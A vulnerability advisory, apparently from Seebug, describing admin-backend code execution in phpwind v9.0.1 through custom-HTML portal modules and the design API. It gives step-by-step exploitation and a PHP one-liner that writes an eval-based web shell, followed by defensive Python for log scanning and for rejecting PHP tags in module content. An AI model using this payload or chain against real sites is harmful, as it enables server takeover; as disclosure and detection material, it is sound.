phpwind command execution getshell (admin backend)

2016-02-19T00:00:00
ID SSV:94465
Type seebug
Reporter Root
Modified 2016-02-19T00:00:00

Description

Brief description:

Latest version downloaded from the official site.

Detailed description:

Set up v9.0.1 and log in.

<img src="https://images.seebug.org/upload/201602/12102252ce0e0a04f54d200949718aa2bd67d7cc.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

In the portal, open Page Management and add a new module of type "custom HTML".

<img src="https://images.seebug.org/upload/201602/12102352b1c95761eb613731f2988f8828bcd126.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

Write a phpinfo() call into it, submit, then use "invoke code".

<img src="https://images.seebug.org/upload/201602/121024281b7641d0fa512c3e91c4801cef5a84d1.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

Choose "call off-site code", copy the link and visit it. Calling it as xml or json both work; taking xml as an example:

<img src="https://images.seebug.org/upload/201602/12102508539f88bff39ade21e1c4e66a4ee7c7e7.png" alt="4.png" width="600" onerror="javascript:errimg(this);">

http://127.0.0.1/phpwind_/www/index.php?m=design&c=api&token=RTwtIGEOYM&id=5&format=xml

<img src="https://images.seebug.org/upload/201602/121025204b580d7243035f4a811248462c8857a9.png" alt="5.png" width="600" onerror="javascript:errimg(this);">

Remove the xml format parameter and phpinfo() is executed.

<img src="https://images.seebug.org/upload/201602/121025480f24a6844bb396069b4dd6565aa28f0e.png" alt="6.png" width="600" onerror="javascript:errimg(this);">

Replace the module code with

<?php fputs(fopen("x.php","w"),"<?eval(\$_POST[cmd]);?>");?>

Visit the link again to getshell.

<img src="https://images.seebug.org/upload/201602/12102639d0f3d2408d509f72ead5d2ac934006f8.png" alt="7.png" width="600" onerror="javascript:errimg(this);">
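Two defensive checks for the behaviour described above, as an added example that is not part of the original report or of phpwind: one scans access-log lines for design-API calls that lack a data format (the condition under which the page says the module is executed as PHP), the other flags custom-HTML module content that carries a PHP open tag so it can be rejected before it is stored. The log lines, IPs and the log format are constructed for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed access-log sample (common log format, placeholder IPs); the
# request paths mirror the URL shape shown in the report above.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Feb/2016:10:25:20 +0800] "GET /phpwind_/www/index.php?m=design&c=api&token=RTwtIGEOYM&id=5&format=xml HTTP/1.1" 200 512
10.0.0.5 - - [19/Feb/2016:10:25:48 +0800] "GET /phpwind_/www/index.php?m=design&c=api&token=RTwtIGEOYM&id=5 HTTP/1.1" 200 40321
10.0.0.7 - - [19/Feb/2016:10:26:39 +0800] "POST /phpwind_/www/x.php HTTP/1.1" 200 88
10.0.0.9 - - [19/Feb/2016:10:27:01 +0800] "GET /phpwind_/www/index.php?m=bbs&c=index HTTP/1.1" 200 7000
"""

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
# Any PHP open tag (<?php, <?=, short <?), but not an XML prolog (<?xml ...).
PHP_TAG_RE = re.compile(r'<\?(?!xml\b)', re.I)

def suspicious_design_api_requests(log_text):
    """Return request paths that hit m=design&c=api without format=xml|json.
    Per the report, such a request runs the module content instead of
    returning it as data, so these are the calls worth alerting on."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        qs = parse_qs(urlparse(m.group("path")).query)
        if qs.get("m") == ["design"] and qs.get("c") == ["api"]:
            fmt = qs.get("format", [""])[0].lower()
            if fmt not in ("xml", "json"):
                hits.append(m.group("path"))
    return hits

def contains_php_code(module_html):
    """True if custom-HTML module content carries a PHP open tag. A safe
    module store rejects (or entity-encodes) such content before saving."""
    return PHP_TAG_RE.search(module_html) is not None
```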

Proof of vulnerability:

The proof section of the report repeats the steps and screenshots of the detailed description above verbatim.